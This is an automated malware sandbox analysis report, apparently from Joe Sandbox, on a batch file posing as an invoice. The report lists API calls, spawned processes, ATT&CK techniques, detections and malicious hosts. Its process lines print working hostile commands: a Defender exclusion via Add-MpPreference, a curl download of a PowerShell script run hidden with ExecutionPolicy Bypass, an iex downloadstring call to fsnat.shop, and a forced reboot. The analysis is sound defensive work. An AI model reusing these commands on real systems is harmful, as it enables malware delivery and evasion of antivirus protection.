            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_00D01000 getenv,printf,printf,__argc,__argv,printf,__argc,GetCommandLineA,JLI_CmdToArgs,JLI_GetStdArgc,JLI_MemAlloc,JLI_GetStdArgs,LdrInitializeThunk,JLI_Launch,11_2_00D01000
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_00D017CE IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,9_2_00D017CE
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDF6C74 VirtualProtect ?,-00000001,00000104,?9_2_6FDF6C74
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDFB67F _encoded_null,LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,9_2_6FDFB67F
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDF9C3F GetProcessHeap,HeapAlloc,_errno,_errno,GetProcessHeap,HeapFree,__doserrno,_errno,_get_osfhandle,SetEndOfFile,_errno,__doserrno,GetLastError,9_2_6FDF9C3F
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDFADFC _crt_debugger_hook,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,9_2_6FDFADFC
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD80807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,9_2_6FD80807
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDFC16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,9_2_6FDFC16F
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_00D017CE IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,11_2_00D017CE
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDFADFC _crt_debugger_hook,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,11_2_6FDFADFC
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD80807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,11_2_6FD80807
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDFC16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,11_2_6FDFC16F

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara match File source: amsi64_6872.amsi.csv, type: OTHER
            Source: Yara match File source: amsi64_7380.amsi.csv, type: OTHER
            Source: Yara match File source: Process Memory Space: curl.exe PID: 6132, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 6872, type: MEMORYSTR
            Source: Yara match File source: C:\Users\Public\Documents\vs1.ps1, type: DROPPED
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "$psakeDir = ([array](dir """C:\Users\user\Desktop\vendor\packages\psake.*"""))[-1]; ".$psakeDir\tools\psake.ps1" build.psake.ps1 -ScriptPath "$psakeDir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\_kjfech8_V\_kjfech8_Vi7.exe "C:\_kjfech8_V\_kjfech8_Vi7.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\shutdown.exe "C:\Windows\system32\shutdown.exe" /r /t 10
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -win 1 -
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -command "$psakedir = ([array](dir """c:\users\user\desktop\vendor\packages\psake.*"""))[-1]; ".$psakedir\tools\psake.ps1" build.psake.ps1 -scriptpath "$psakedir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }"
            Source: powershell.exe, 00000004.00000002.30098453152.000001E7A2B4E000.00000004.00000800.00020000.00000000.sdmp, _kjfech8_Vi7.exe, 0000000B.00000002.29806435683.000000006C6D4000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: @Winapi@Windows@DOF_PROGMAN
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,_invoke_watson,9_2_6FD8888A
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,9_2_6FD8871C
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,9_2_6FD886FD
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,9_2_6FD865F0
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,9_2_6FD885AC
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,_mbsnbicoll,strlen,EnumSystemLocalesA,strcpy_s,_invoke_watson,9_2_6FD88468
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: strlen,EnumSystemLocalesA,9_2_6FDFF42E
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: strlen,strlen,EnumSystemLocalesA,9_2_6FDFF3C7
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetLocaleInfoA,_stricmp,_stricmp,9_2_6FDFF307
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,strlen,GetLocaleInfoA,_stricmp,strlen,_stricmp,9_2_6FDFF136
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,strlen,9_2_6FDFF0DB
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetLocaleInfoA,_stricmp,9_2_6FDFF034
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,_invoke_watson,11_2_6FD8888A
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,11_2_6FD8871C
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,11_2_6FD886FD
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,11_2_6FD865F0
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,11_2_6FD885AC
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,_mbsnbicoll,strlen,EnumSystemLocalesA,strcpy_s,_invoke_watson,11_2_6FD88468
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: strlen,EnumSystemLocalesA,11_2_6FDFF42E
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: strlen,strlen,EnumSystemLocalesA,11_2_6FDFF3C7
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetLocaleInfoA,_stricmp,_stricmp,11_2_6FDFF307
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,strlen,GetLocaleInfoA,_stricmp,strlen,_stricmp,11_2_6FDFF136
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: GetLocaleInfoW,strlen,11_2_6FDFF0DB
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: _getptd,GetLocaleInfoA,_stricmp,11_2_6FDFF034
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
            Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_00D016F9 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_00D016F9
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD96340 _lock,__tzname,_get_timezone,_get_daylight,_get_dstbias,___lc_codepage_func,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__timezone,__daylight,__dstbias,strcmp,free,strlen,_malloc_crt,strlen,strcpy_s,_invoke_watson,free,strncpy_s,atol,atol,atol,strncpy_s,__timezone,__daylight,9_2_6FD96340
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDBBCAE GetSystemInfo,memset,GetVersionExW,??0unsupported_os@Concurrency@@QAE@XZ,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,??0unsupported_os@Concurrency@@QAE@XZ,GetModuleHandleW,GetProcAddress,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,GetLastError,GetLastError,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,malloc,??0exception@std@@QAE@ABQBDH@Z,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,free,GetLastError,GetLastError,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,malloc,??0exception@std@@QAE@ABQBDH@Z,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,free,??0unsupported_os@Concurrency@@QAE@XZ,9_2_6FDBBCAE
Source: powershell.exe, 00000004.00000002.30085176960.000001E7908CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
MITRE ATT&CK matrix (table layout lost in extraction).
Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.
Techniques that appear as separate entries in the matrix: Scripting; Windows Management Instrumentation; Native API; Command and Scripting Interpreter; PowerShell; DLL Side-Loading; Registry Run Keys / Startup Folder; Abuse Elevation Control Mechanism; Process Injection; Disable or Modify Tools; Deobfuscate/Decode Files or Information; Obfuscated Files or Information; Software Packing; Timestomp; Masquerading; Virtualization/Sandbox Evasion; System Time Discovery; File and Directory Discovery; System Information Discovery; Security Software Discovery; Process Discovery; Application Window Discovery; Archive Collected Data; Ingress Tool Transfer; Encrypted Channel; Non-Application Layer Protocol; Application Layer Protocol; System Shutdown/Reboot.
Behavior graph (ID: 1542952; Sample: Factura-2410-CFDI.bat; Start date: 27/10/2024; Architecture: WINDOWS; Score: 100). Graph image not preserved.

            No Antivirus matches
Source | Detection | Scanner | Label
C:\Users\Public\computer_kjfech8_V.cmd | 100% | Avira | BAT/Runner.VPF
C:\Users\Public\computer_kjfech8_Vy.cmd | 100% | Avira | BAT/Runner.VPF
C:\Users\Public\Documents\vs1.ps1 | 100% | Avira | TR/PShell.Dldr.VPJ
C:\Windows \System32\fodhelper.exe | 3% | ReversingLabs |
C:\_kjfech8_V\MSVCR100.dll (copy) | 0% | ReversingLabs |
C:\_kjfech8_V\MSVCR100.txt | 0% | ReversingLabs |
C:\_kjfech8_V\WebView2Loader.dll (copy) | 0% | ReversingLabs |
C:\_kjfech8_V\WebView2Loader.txt | 0% | ReversingLabs |
C:\_kjfech8_V\_kjfech8_V.exe (copy) | 0% | ReversingLabs |
C:\_kjfech8_V\_kjfech8_Vi7.exe (copy) | 0% | ReversingLabs |
C:\_kjfech8_V\exe.txt | 0% | ReversingLabs |
C:\_kjfech8_V\i7.txt | 0% | ReversingLabs |
C:\_kjfech8_V\jli.dll | 19% | ReversingLabs |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fsnat.shop | 93.127.200.211 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://62.72.3.210/ldht/index.php | true | | unknown
https://fsnat.shop/a/08/150822/up/up | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
93.127.200.211 | fsnat.shop | Germany | 62255 | ASMUNDA-ASSC | true
62.72.3.210 | unknown | Germany | 5427 | PRTL-DE | true
86.38.217.167 | unknown | Lithuania | 15419 | LRTC-ASLT | false
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1542952
                                                            Start date and time:2024-10-27 00:19:16 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 50s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                            Number of analysed new started processes analysed:21
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
